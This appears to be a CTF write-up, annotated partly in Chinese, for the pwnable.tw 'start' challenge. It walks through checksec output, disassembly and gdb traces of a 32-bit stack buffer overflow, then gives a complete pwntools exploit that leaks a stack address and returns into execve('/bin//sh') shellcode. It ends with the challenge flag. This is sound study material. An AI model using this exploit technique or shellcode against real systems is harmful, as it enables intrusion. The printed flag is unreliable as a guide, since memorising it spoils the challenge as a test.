0x00
This message is shown once a day. To disable it please create the
/home/fekue/.hushlogin file.
fekue@LAPTOP-7LRFS4O3:/mnt/c/Users/hwjco/Desktop$ checksec start
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/fekue/.cache/.pwntools-cache-3.8/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[*] You have the latest version of Pwntools (4.6.0)
[*] '/mnt/c/Users/hwjco/Desktop/start'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
fekue@LAPTOP-7LRFS4O3:/mnt/c/Users/hwjco/Desktop$
0x01
- 进入 IDA Pro，反汇编入口函数 `_start`（程序不经过 libc，直接用 `int 80h` 发系统调用）
; Entry point of the pwnable.tw "start" binary (i386, no libc, raw int 80h syscalls).
; What the instructions below do, in order:
;   1. save the entry esp and push the address of _exit as the return address;
;   2. write(1, esp, 0x14): print the 20-byte prompt "Let's start the CTF:"
;      that was just pushed onto the stack as five dwords;
;   3. read(0, esp, 0x3c): read up to 60 bytes into that same 20-byte slot;
;   4. add esp, 14h / retn: pop whatever now sits 20 bytes into the slot.
; Bug: step 3 accepts 40 bytes more than the slot holds, so input bytes 20..23
; replace the _exit address that retn pops (EIP = 0x61616161 in the gdb run
; below) and bytes 24..27 replace the saved esp. There is no stack canary and
; NX is disabled (checksec above), so the stack itself is executable.
public _start                   ; exported entry symbol
_start proc near
push esp                        ; save entry esp; _exit begins with `pop esp` and restores it
push offset _exit               ; return address for the final retn (normal path: exit cleanly)
xor eax, eax                    ; zero the syscall registers so the byte-sized moves
xor ebx, ebx                    ; below (al/bl/dl) set the whole register
xor ecx, ecx
xor edx, edx
push 3A465443h                  ; "CTF:"  -- the five pushes spell "Let's start the CTF:"
push 20656874h                  ; "the "     (little-endian; lowest address holds "Let'")
push 20747261h                  ; "art "
push 74732073h                  ; "s st"
push 2774654Ch                  ; "Let'"
mov ecx, esp ; addr: buf = esp, start of the 20-byte prompt
mov dl, 14h ; len: count = 0x14 = 20 bytes
mov bl, 1 ; fd: 1 = stdout
mov al, 4                       ; eax = 4 = sys_write
int 80h ; LINUX - sys_write: write(1, esp, 20)
xor ebx, ebx                    ; fd = 0 (stdin); ecx still points at the same 20-byte slot
mov dl, 3Ch ; count = 0x3c = 60 bytes (IDA shows the ASCII '<') -- 40 more than the slot holds
mov al, 3                       ; eax = 3 = sys_read
int 80h ; LINUX - sys_read: read(0, esp, 60) -- the overflow
add esp, 14h                    ; discard the 20-byte slot ...
retn                            ; ... and return to the dword right after it: _exit normally,
                                ; input bytes 20..23 once the read overflowed
_start endp ; sp-analysis failed
0x02
0x03
gdb-peda$ x/20i $eip
=> 0x8048060 <_start>: push esp
0x8048061 <_start+1>: push 0x804809d
0x8048066 <_start+6>: xor eax,eax
0x8048068 <_start+8>: xor ebx,ebx
0x804806a <_start+10>: xor ecx,ecx
0x804806c <_start+12>: xor edx,edx
0x804806e <_start+14>: push 0x3a465443
0x8048073 <_start+19>: push 0x20656874
0x8048078 <_start+24>: push 0x20747261
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
0x8048087 <_start+39>: mov ecx,esp
0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
0x8048091 <_start+49>: xor ebx,ebx
0x8048093 <_start+51>: mov dl,0x3c
0x8048095 <_start+53>: mov al,0x3
0x8048097 <_start+55>: int 0x80
- 单步执行到 `mov ecx, esp`。此时从 esp 开始依次是 20 字节的提示串 "Let's start the CTF:"、`_exit` 的地址（最后 `retn` 要弹出的返回地址）以及入口处 `push esp` 保存的原始 esp：
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd054 ("Let's start the"...)
EIP: 0x8048087 (<_start+39>: mov ecx,esp)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048078 <_start+24>: push 0x20747261
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
=> 0x8048087 <_start+39>: mov ecx,esp
0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
[------------------------------------stack-------------------------------------]
0000| 0xffffd054 ("Let's start the"...)
0004| 0xffffd058 ("s start the CTF"...)
0008| 0xffffd05c ("art the CTF:\235\200\004"...)
0012| 0xffffd060 ("the CTF:\235\200\004\bp\320\377"...)
0016| 0xffffd064 ("CTF:\235\200\004\bp\320\377\377\001")
0020| 0xffffd068 --> 0x804809d (<_exit>: pop esp)
0024| 0xffffd06c --> 0xffffd070 --> 0x1
0028| 0xffffd070 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048087 in _start ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x0
EBX 0x0
ECX 0x0
EDX 0x0
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd054 ◂— 0x2774654c ("Let'")
EIP 0x8048087 (_start+39) ◂— mov ecx, esp
───────────────────────────────────[ DISASM ]───────────────────────────────────
0x804806e <_start+14> push 0x3a465443
0x8048073 <_start+19> push 0x20656874
0x8048078 <_start+24> push 0x20747261
0x804807d <_start+29> push 0x74732073
0x8048082 <_start+34> push 0x2774654c
► 0x8048087 <_start+39> mov ecx, esp
0x8048089 <_start+41> mov dl, 0x14
0x804808b <_start+43> mov bl, 1
0x804808d <_start+45> mov al, 4
0x804808f <_start+47> int 0x80
0x8048091 <_start+49> xor ebx, ebx
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd054 ◂— 0x2774654c ("Let'")
01:0004│ 0xffffd058 ◂— 0x74732073 ('s st')
02:0008│ 0xffffd05c ◂— 0x20747261 ('art ')
03:000c│ 0xffffd060 ◂— 0x20656874 ('the ')
04:0010│ 0xffffd064 ◂— 0x3a465443 ('CTF:')
05:0014│ 0xffffd068 —▸ 0x804809d (_exit) ◂— pop esp
06:0018│ 0xffffd06c —▸ 0xffffd070 ◂— 0x1
07:001c│ 0xffffd070 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 8048087 _start+39
gdb-peda$
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd054 ("Let's start the"...)
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd054 ("Let's start the"...)
EIP: 0x8048089 (<_start+41>: mov dl,0x14)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804807d <_start+29>: push 0x74732073
0x8048082 <_start+34>: push 0x2774654c
0x8048087 <_start+39>: mov ecx,esp
=> 0x8048089 <_start+41>: mov dl,0x14
0x804808b <_start+43>: mov bl,0x1
0x804808d <_start+45>: mov al,0x4
0x804808f <_start+47>: int 0x80
0x8048091 <_start+49>: xor ebx,ebx
[------------------------------------stack-------------------------------------]
0000| 0xffffd054 ("Let's start the"...)
0004| 0xffffd058 ("s start the CTF"...)
0008| 0xffffd05c ("art the CTF:\235\200\004"...)
0012| 0xffffd060 ("the CTF:\235\200\004\bp\320\377"...)
0016| 0xffffd064 ("CTF:\235\200\004\bp\320\377\377\001")
0020| 0xffffd068 --> 0x804809d (<_exit>: pop esp)
0024| 0xffffd06c --> 0xffffd070 --> 0x1
0028| 0xffffd070 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048089 in _start ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x0
EBX 0x0
ECX 0xffffd054 ◂— 0x2774654c ("Let'")
EDX 0x0
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd054 ◂— 0x2774654c ("Let'")
EIP 0x8048089 (_start+41) ◂— mov dl, 0x14
───────────────────────────────────[ DISASM ]───────────────────────────────────
0x8048073 <_start+19> push 0x20656874
0x8048078 <_start+24> push 0x20747261
0x804807d <_start+29> push 0x74732073
0x8048082 <_start+34> push 0x2774654c
0x8048087 <_start+39> mov ecx, esp
► 0x8048089 <_start+41> mov dl, 0x14
0x804808b <_start+43> mov bl, 1
0x804808d <_start+45> mov al, 4
0x804808f <_start+47> int 0x80
0x8048091 <_start+49> xor ebx, ebx
0x8048093 <_start+51> mov dl, 0x3c
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ ecx esp 0xffffd054 ◂— 0x2774654c ("Let'")
01:0004│ 0xffffd058 ◂— 0x74732073 ('s st')
02:0008│ 0xffffd05c ◂— 0x20747261 ('art ')
03:000c│ 0xffffd060 ◂— 0x20656874 ('the ')
04:0010│ 0xffffd064 ◂— 0x3a465443 ('CTF:')
05:0014│ 0xffffd068 —▸ 0x804809d (_exit) ◂— pop esp
06:0018│ 0xffffd06c —▸ 0xffffd070 ◂— 0x1
07:001c│ 0xffffd070 ◂— 0x1
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 8048089 _start+41
gdb-peda$
- 运行程序并输入 24 个 `a`（前 20 字节填满栈上的缓冲区，第 21～24 字节覆盖返回地址）
gdb-peda$ r
Starting program: /home/giantbranch/pwn/start
Let's start the CTF:aaaaaaaaaaaaaaaaaaaaaaaa
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x19
EBX: 0x0
ECX: 0xffffd054 ('a' <repeats 15 times>...)
EDX: 0x3c ('<')
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffffd06c --> 0xffffd00a --> 0x0
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x61616161
[------------------------------------stack-------------------------------------]
0000| 0xffffd06c --> 0xffffd00a --> 0x0
0004| 0xffffd070 --> 0x1
0008| 0xffffd074 --> 0xffffd259 ("/home/giantbran"...)
0012| 0xffffd078 --> 0x0
0016| 0xffffd07c --> 0xffffd275 ("XDG_VTNR=7")
0020| 0xffffd080 --> 0xffffd280 ("XDG_SESSION_ID="...)
0024| 0xffffd084 --> 0xffffd292 ("CLUTTER_IM_MODU"...)
0028| 0xffffd088 --> 0xffffd2a8 ("XDG_GREETER_DAT"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
EAX 0x19
EBX 0x0
ECX 0xffffd054 ◂— 0x61616161 ('aaaa')
EDX 0x3c
EDI 0x0
ESI 0x0
EBP 0x0
ESP 0xffffd06c —▸ 0xffffd00a ◂— 0x0
EIP 0x61616161 ('aaaa')
───────────────────────────────────[ DISASM ]───────────────────────────────────
Invalid address 0x61616161
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ esp 0xffffd06c —▸ 0xffffd00a ◂— 0x0
01:0004│ 0xffffd070 ◂— 0x1
02:0008│ 0xffffd074 —▸ 0xffffd259 ◂— 0x6d6f682f ('/hom')
03:000c│ 0xffffd078 ◂— 0x0
04:0010│ 0xffffd07c —▸ 0xffffd275 ◂— 'XDG_VTNR=7'
05:0014│ 0xffffd080 —▸ 0xffffd280 ◂— 0x5f474458 ('XDG_')
06:0018│ 0xffffd084 —▸ 0xffffd292 ◂— 0x54554c43 ('CLUT')
07:001c│ 0xffffd088 —▸ 0xffffd2a8 ◂— 0x5f474458 ('XDG_')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
► f 0 61616161
Program received signal SIGSEGV (fault address 0x61616161)
gdb-peda$
eip 已经被控制为 0x61616161（"aaaa"）：`read` 允许读入 0x3c = 60 字节，而栈上缓冲区只有 0x14 = 20 字节，第 21～24 字节正好覆盖 `add esp, 14h; retn` 弹出的返回地址。由于没有 canary、NX 关闭（栈可执行），接下来只需先泄露栈地址，再把返回地址指向栈上的 shellcode 即可。
0x04
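from pwn import *
# context(log_level='debug', arch='i386', os='linux')

# Target: pwnable.tw "start" (i386; no canary, NX disabled, no PIE -- see checksec above).
# _start writes a 20-byte prompt from esp, then does read(0, esp, 0x3c) into that
# same 20-byte slot, so input bytes 20..23 overwrite the return address that
# `add esp, 14h; retn` pops. The exploit needs two rounds: leak a stack address,
# then return into shellcode placed on the (executable) stack.
p = remote('chall.pwnable.tw', 10000)

# All payload material is bytes: pwntools 4.x on Python 3 (the environment shown
# above uses a 3.8 cache) raises TypeError on str + bytes, and a str literal such
# as '\xc9' would be UTF-8 encoded into two bytes, corrupting the shellcode.
# execve("/bin//sh", 0, 0) in 21 bytes:
#   xor ecx,ecx ; mul ecx (eax = edx = 0) ; push ecx ; push "//sh" ; push "/bin"
#   mov ebx,esp ; mov al,0xb ; int 0x80
shellcode = (b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68'
             b'\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80')

BUF_LEN = 20                # size of the stack slot that read() overflows
READ_MAX = 0x3c             # bytes read() accepts per round
MOV_ECX_ESP = 0x08048087    # _start+39: mov ecx, esp -- re-enters the write syscall


def leak():
    """Return the program's entry esp, leaked by returning into `mov ecx, esp`.

    After the first retn pops our fake return address, esp points at the value
    `push esp` saved on entry. Jumping back to _start+39 runs write(1, esp, 20),
    so the first 4 bytes we get back are that saved esp.
    """
    p.recvuntil(b'CTF:')                    # wait for the whole 20-byte prompt
    payload = b'a' * BUF_LEN + p32(MOV_ECX_ESP)
    p.send(payload)
    stack_addr = u32(p.recvn(4))            # exactly 4 bytes; recv(4) may return fewer
    # log.info('leaked esp: %#x', stack_addr)
    return stack_addr


def get_pwn(addr):
    """Second round: point the return address at shellcode placed after it.

    `addr` is the leaked entry esp. This read() lands at addr - 4 (where esp was
    left after the first retn), so the return slot is bytes 20..23 (addr + 16)
    and the shellcode that follows starts at addr + 20.
    """
    payload = b'A' * BUF_LEN + p32(addr + 20) + shellcode
    assert len(payload) <= READ_MAX, 'payload exceeds what read() accepts'
    p.send(payload)
    p.interactive()


addr = leak()
get_pwn(addr)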
FLAG{Pwn4bl3_tW_1s_y0ur_st4rt}